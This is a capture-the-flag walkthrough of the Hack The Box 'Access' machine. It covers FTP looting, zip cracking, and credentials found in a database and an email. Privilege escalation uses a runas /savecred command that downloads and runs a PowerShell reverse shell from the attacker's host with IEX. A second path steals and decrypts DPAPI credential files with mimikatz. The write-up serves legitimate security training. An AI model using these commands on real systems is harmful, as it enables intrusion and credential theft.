# HTB - Access

## Enumeration

***

**Scope**

> IP Address: 10.10.10.98

**Nmap Scan**

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ nmap -p- --min-rate 10000 $ip -Pn -vv

PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack
23/tcp open  telnet  syn-ack
80/tcp open  http    syn-ack

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ nmap -p21,23,80 $ip -sCV -oN Nmap/script-scan

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
| ftp-syst: 
|_  SYST: Windows_NT
23/tcp open  telnet?
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: MegaCorp
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

```
* Open ports: 21 - 23 - 80
* UDP Open ports: None
* Services: FTP - TELNET - HTTP
* Versions: Microsoft ftpd, Microsoft IIS httpd 7.5 (Windows)
* Important Notes: anonymous FTP login allowed; TRACE method enabled on IIS
```

**Enumeration**

**HTTP** The web app didn't reveal anything except this image at `http://10.10.10.98`

<figure><img src="/files/dwDJgpBItUNbUYD3PvQ2" alt=""><figcaption></figcaption></figure>

**FTP** I usually download all files from the FTP server with one command and explore them locally

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ wget -m --no-passive ftp://anonymous:anonymous@$ip 

<snip>
FINISHED --2024-07-07 11:19:01--
Total wall clock time: 1m 4s
Downloaded: 5 files, 5.4M in 43s (129 KB/s)
```

All files are downloaded into the `10.10.10.98` folder

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ ls
10.10.10.98 Nmap

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ tree 10.10.10.98  
10.10.10.98
├── Backups
│   └── backup.mdb
└── Engineer
    └── Access Control.zip
```

Looking into the `zip` file, it contains a `.pst` file and is AES-encrypted

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ unzip -l 10.10.10.98/Engineer/Access\ Control.zip
Archive:  10.10.10.98/Engineer/Access Control.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
   271360  2018-08-24 01:13   Access Control.pst

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ file 10.10.10.98/Engineer/Access\ Control.zip
10.10.10.98/Engineer/Access Control.zip: Zip archive data, at least v2.0 to extract, compression method=AES Encrypted
```

I will extract the hash with `zip2john` (John the Ripper) and attempt to crack it

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ zip2john Access\ Control.zip > zip.hash
```

Cracking with `rockyou.txt` failed

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ john zip.hash --wordlist=/usr/share/wordlists/rockyou.txt   

<snip>
Session completed. 

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ john zip.hash --show                                     
0 password hashes cracked, 1 left
```

I want to know what that file is, and from the output below `file` identifies it as a `Microsoft Access Database`

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ file 10.10.10.98/Backups/backup.mdb 
10.10.10.98/Backups/backup.mdb: Microsoft Access Database
```

I moved it to a Windows host and explored it there.

<figure><img src="/files/XUb25aUKuiE6worSp7Ne" alt=""><figcaption></figcaption></figure>

I found a table containing usernames and passwords

```
admin:admin
engineer:access4u@security
backup_admin:admin
```

I will try these credentials over telnet, since SMB is not exposed

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ hydra -L users.lst -P passwords.list telnet://$ip

1 of 1 target completed, 0 valid password found
```

## Initial Access

***

I remember that I couldn't crack the `zip` file, so I will try these passwords against it

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ john zip.hash --wordlist=passwords.list                  

<snip>
access4u@security (Access Control.zip/Access Control.pst) 
```

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ 7z x Access\ Control.zip                                                                           
<snip>
Enter password (will not be echoed):

Everything is Ok

Size:       271360
Compressed: 10870
```

It revealed the `Access Control.pst` file, and I wanted to know its type

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ file Access\ Control.pst 
Access Control.pst: Microsoft Outlook Personal Storage (>=2003, Unicode, version 23), dwReserved1=0x234, dwReserved2=0x22f3a, bidUnused=0000000000000000, dwUnique=0x39, 271360 bytes, bCryptMethod=1, CRC32 0x744a1e2e
```

It's a `Microsoft Outlook Personal Storage` file, so I moved it to my Windows host and opened it with `Outlook`

It contains an email with the following data

<figure><img src="/files/9LU88uybYZ1fLCZaznCq" alt=""><figcaption></figcaption></figure>

```
Hi there,

The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is passed on to your engineers.

Regards,
John
```

So we get new credentials, `security:4Cc3ssC0ntr0ller`, and I will try them on telnet

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ telnet $ip     

login: security
password: 

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>
```

```bash
C:\Users\security>type Desktop\user.txt
713d8fafce27a927227b6a3124c79ea3
```

> User Flag: 713d8fafce27a927227b6a3124c79ea3

***

## Privilege Escalation

When I land on any Windows machine on `HTB`, I always run `cmdkey /list` to view saved credentials

```powershell
C:\Users>cmdkey /list

Currently stored credentials:
    Target: Domain:interactive=ACCESS\Administrator
                                                       Type: Domain Password
    User: ACCESS\Administrator    
```

A saved credential for `ACCESS\Administrator` like this can be used with the `runas /savecred` command to run commands as that user.

Since we can't execute `.exe` files, I will execute a `.ps1` as administrator instead: I grab `Invoke-PowerShellTcp.ps1` on my host, start a web server and an `nc` listener, and run the command as `administrator`

We must add this line to the end of `Invoke-PowerShellTcp.ps1` before running it, so the function is actually called once the script is downloaded

```powershell
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.3 -Port 443
```

Change the IP and port to yours when modifying the file

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ python3 -m http.server 80
```

Netcat listener

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ rlwrap nc -lvnp 443
```

```powershell
C:\Users\security> runas /savecred /user:ACCESS\Administrator "PowerShell -c IEX (New-Object Net.webclient).DownloadString('http://10.10.16.3/Invoke-PowerShellTcp.ps1')"
```

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ web-server                                        
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.98 - - [08/Jul/2024 05:31:42] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.98] 49161

PS C:\Windows\system32>whoami 
access\administrator
```

```powershell
PS C:\Windows\system32> cd C:\Users\administrator\Desktop\
PS C:\Users\administrator\Desktop> type root.txt
066b2ca40b4ab07b4387c6e4fe06bc32
```

> Root Flag: 066b2ca40b4ab07b4387c6e4fe06bc32

## Alternative path

Since the administrator credential is stored in the `security` user's Credential Manager, we can recover it by decrypting the `DPAPI` secrets

We need two files, the `masterkey` and the `credentials` blob. Both are located in the current user's profile under `C:\Users\Security\AppData\Roaming\Microsoft\` (in `Protect\<SID>\` and `Credentials\` respectively), but they are hidden.

I use `ls` with the `-Force` flag to list hidden files

```powershell
C:\Users\security>powershell -c ls -Force C:\Users\Security\AppData\Roaming\Microsoft\


    Directory: C:\Users\Security\AppData\Roaming\Microsoft

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
<snip>
d---s         8/22/2018  10:18 PM            Credentials
d---s         8/22/2018  10:18 PM            Protect
<snip>

C:\Users\security>powershell -c ls -Force C:\Users\Security\AppData\Roaming\Microsoft\Protect

    Directory: C:\Users\Security\AppData\Roaming\Microsoft\Protect

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d---s         8/22/2018  10:18 PM            S-1-5-21-953262931-566350628-63446256-1001
-a-hs         8/22/2018  10:18 PM         24 CREDHIST

C:\Users\security>powershell -c ls -Force C:\Users\Security\AppData\Roaming\Microsoft\Credentials

    Directory: C:\Users\Security\AppData\Roaming\Microsoft\Credentials

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a-hs         8/22/2018  10:18 PM        538 51AB168BE4BDB3A603DADE4F8CA81290
```

I will base64-encode the two files with `certutil` and decode them on my attack host

```PowerShell
C:\Users\security>powershell -c certutil -encode C:\Users\Security\AppData\Roaming\Microsoft\Protect\S-1-5-21-953262931-566350628-63446256-1001\0792c32e-48a5-4fe3-8b43-d93d64590580 .\key
CertUtil: -encode command completed successfully.

C:\Users\security>powershell -c certutil -encode C:\Users\Security\AppData\Roaming\Microsoft\Credentials\51AB168BE4BDB3A603DADE4F8CA81290 .\key1
CertUtil: -encode command completed successfully.

C:\Users\security>type key
-----BEGIN CERTIFICATE-----
<snip>
-----END CERTIFICATE-----

C:\Users\security>type key1
-----BEGIN CERTIFICATE-----
<snip>
-----END CERTIFICATE-----
```

On a Windows host, I decrypt the master key with `mimikatz`, supplying the `security` user's SID and password:

```PowerShell

mimikatz # dpapi::masterkey /in:C:\Users\HTB\Desktop\masterkey /sid:S-1-5-21-953262931-566350628-63446256-1001 /password:4Cc3ssC0ntr0ller
**MASTERKEYS**
  dwVersion          : 00000002 - 2
  szGuid             : {0792c32e-48a5-4fe3-8b43-d93d64590580}
  dwFlags            : 00000005 - 5
  dwMasterKeyLen     : 000000b0 - 176
  dwBackupKeyLen     : 00000090 - 144
  dwCredHistLen      : 00000014 - 20
  dwDomainKeyLen     : 00000000 - 0
[masterkey]
  **MASTERKEY**
    dwVersion        : 00000002 - 2
    salt             : 9c51ca4d00708c73d4fbff60b95e549e
    rounds           : 000043f8 - 17400
    algHash          : 0000800e - 32782 (CALG_SHA_512)
    algCrypt         : 00006610 - 26128 (CALG_AES_256)
    pbKey            : e78fb1d989c4ccd7a05285c17fae1c31ad1210f7ada051ae3203536df613e63a0e4647ca9ed51407637d8c1cc2ad16b2306aab56d7d2707b0c77422e7de39eb8bdfcca55044b4a7f853b6f0b3333213b5b0d80c7c1021f6c4ac2f5fa3772adbe50af7fdf07b0e0ea940d70a1245db7df847f615530a93895012a3ad9c7a8c39cc0592d06d714c9ee8fe34ced5062c412

[backupkey]
  **MASTERKEY**
    dwVersion        : 00000002 - 2
    salt             : 4bb6dd9b5b9656d97b78f114796457f4
    rounds           : 000043f8 - 17400
    algHash          : 0000800e - 32782 (CALG_SHA_512)
    algCrypt         : 00006610 - 26128 (CALG_AES_256)
    pbKey            : 0fe6b3aa5dd3af46bd7a87cbc0161fc41ae13f8714a22bcb5bda86f24d95ad03369a5335159185d0276743d0c1132b35fdaffad247d3c4f5f43260413c28b401ed70e42e0184f9e8c4668abc36eb7327bd2c7374a2381b4cdd4ea7c465deaa755e0f53672473900db8868b428327edaa

[credhist]
  **CREDHIST INFO**
    dwVersion        : 00000003 - 3
    guid             : {009668e5-9305-401b-ba0d-dfa0e11b34d0}



[masterkey] with password: 4Cc3ssC0ntr0ller (normal user)
  key : b360fa5dfea278892070f4d086d47ccf5ae30f7206af0927c33b13957d44f0149a128391c4344a9b7b9c9e2e5351bfaf94a1a715627f27ec9fafb17f9b4af7d2
  sha1: bf6d0654ef999c3ad5b09692944da3c0d0b68afe
```

Decrypting the `credentials` file with the master key

{% hint style="info" %}
Note: the master key can be passed explicitly with `/masterkey:<key>`, but mimikatz already has it cached from the previous step and uses it automatically
{% endhint %}

```PowerShell
mimikatz # dpapi::cred /in:C:\Users\HTB\Desktop\credentials
**BLOB**
  dwVersion          : 00000001 - 1
  guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
  dwMasterKeyVersion : 00000001 - 1
  guidMasterKey      : {0792c32e-48a5-4fe3-8b43-d93d64590580}
  dwFlags            : 20000000 - 536870912 (system ; )
  dwDescriptionLen   : 0000003a - 58
  szDescription      : Enterprise Credential Data

  algCrypt           : 00006610 - 26128 (CALG_AES_256)
  dwAlgCryptLen      : 00000100 - 256
  dwSaltLen          : 00000020 - 32
  pbSalt             : f5bbbac240bd90d9af7d3c2cfb7f301f1f123ac94d07a3cc012038135fa5a6bc
  dwHmacKeyLen       : 00000000 - 0
  pbHmackKey         :
  algHash            : 0000800e - 32782 (CALG_SHA_512)
  dwAlgHashLen       : 00000200 - 512
  dwHmac2KeyLen      : 00000020 - 32
  pbHmack2Key        : f9642d323fae366a4f7293d02f26e4472adc32b00bac6a061914458dadfd3e52
  dwDataLen          : 00000100 - 256
  pbData             : <snip>
  dwSignLen          : 00000040 - 64
  pbSign             : 63fcc153bcd60befd074a5098ea0e552f8809562c553985baa8720a828e61e05bd5d1cb8200711551a100ed3b853598b3875ba90b689bc483342fbf671b89c99

Decrypting Credential:
 * volatile cache: GUID:{0792c32e-48a5-4fe3-8b43-d93d64590580};KeyHash:bf6d0654ef999c3ad5b09692944da3c0d0b68afe;Key:available
**CREDENTIAL**
  credFlags      : 00000030 - 48
  credSize       : 000000f4 - 244
  credUnk0       : 00002004 - 8196

  Type           : 00000002 - 2 - domain_password
  Flags          : 00000000 - 0
  LastWritten    : 8/22/2018 9:18:49 PM
  unkFlagsOrSize : 00000038 - 56
  Persist        : 00000003 - 3 - enterprise
  AttributeCount : 00000000 - 0
  unk0           : 00000000 - 0
  unk1           : 00000000 - 0
  TargetName     : Domain:interactive=ACCESS\Administrator
  UnkData        : (null)
  Comment        : (null)
  TargetAlias    : (null)
  UserName       : ACCESS\Administrator
  CredentialBlob : 55Acc3ssS3cur1ty@megacorp
  Attributes     : 0
```
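The mimikatz output above is just a walk over the cleartext envelope of a DPAPI blob: everything up to `pbData` is readable without any key. As an added example (not the author's code and not mimikatz), here is a small Python parser for that envelope, useful in triage to see which master key GUID a credential blob depends on and which algorithms protect it, without decrypting anything. The sample blob is constructed; the provider and master key GUIDs are the ones printed above, the rest is filler.

```python
import struct
import uuid

ALG_NAMES = {0x6610: "CALG_AES_256", 0x800E: "CALG_SHA_512"}  # CALG_* ids mimikatz prints

def _u32(buf, off):
    return struct.unpack_from("<I", buf, off)[0], off + 4

def _prefixed(buf, off):  # DWORD length followed by that many bytes
    n, off = _u32(buf, off)
    return buf[off:off + n], off + n

def parse_dpapi_blob(blob):
    """Walk the cleartext envelope of a DPAPI blob; nothing is decrypted."""
    info, off = {}, 0
    info["version"], off = _u32(blob, off)
    info["provider"] = str(uuid.UUID(bytes_le=blob[off:off + 16])); off += 16
    info["masterkey_version"], off = _u32(blob, off)
    info["masterkey_guid"] = str(uuid.UUID(bytes_le=blob[off:off + 16])); off += 16
    info["flags"], off = _u32(blob, off)
    desc, off = _prefixed(blob, off)
    info["description"] = desc.decode("utf-16-le").rstrip("\x00")
    info["alg_crypt"], info["alg_crypt_bits"] = struct.unpack_from("<II", blob, off); off += 8
    info["salt"], off = _prefixed(blob, off)
    info["hmac_key"], off = _prefixed(blob, off)
    info["alg_hash"], info["alg_hash_bits"] = struct.unpack_from("<II", blob, off); off += 8
    info["hmac2_key"], off = _prefixed(blob, off)
    info["data"], off = _prefixed(blob, off)
    info["sign"], off = _prefixed(blob, off)
    if off != len(blob):
        raise ValueError("trailing bytes after DPAPI blob")
    return info

def build_sample_blob():
    """Constructed sample blob (not the file from the box); filler bytes are dummies."""
    desc = "Enterprise Credential Data\x00".encode("utf-16-le")
    return b"".join([
        struct.pack("<I", 1),
        uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb").bytes_le,  # DPAPI provider GUID
        struct.pack("<I", 1),
        uuid.UUID("0792c32e-48a5-4fe3-8b43-d93d64590580").bytes_le,  # master key GUID
        struct.pack("<I", 0x20000000),                              # "system" flag shown above
        struct.pack("<I", len(desc)), desc,
        struct.pack("<II", 0x6610, 256),                            # AES-256
        struct.pack("<I", 32), bytes(range(32)),                    # salt
        struct.pack("<I", 0),                                       # no HMAC key
        struct.pack("<II", 0x800E, 512),                            # SHA-512
        struct.pack("<I", 32), bytes(range(32, 64)),                # HMAC2 key
        struct.pack("<I", 16), b"\xaa" * 16,                        # ciphertext
        struct.pack("<I", 64), b"\xbb" * 64,                        # signature
    ])
```

The `masterkey_guid` field is what tells a responder which file under `Protect\<SID>\` a given credential blob needs, which is how the two files above were paired.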

So the administrator credentials are `administrator:55Acc3ssS3cur1ty@megacorp`

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ telnet $ip

login: administrator
password: 

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\Administrator>type Desktop\root.txt
066b2ca40b4ab07b43xxxxxxxxxxxxx
```
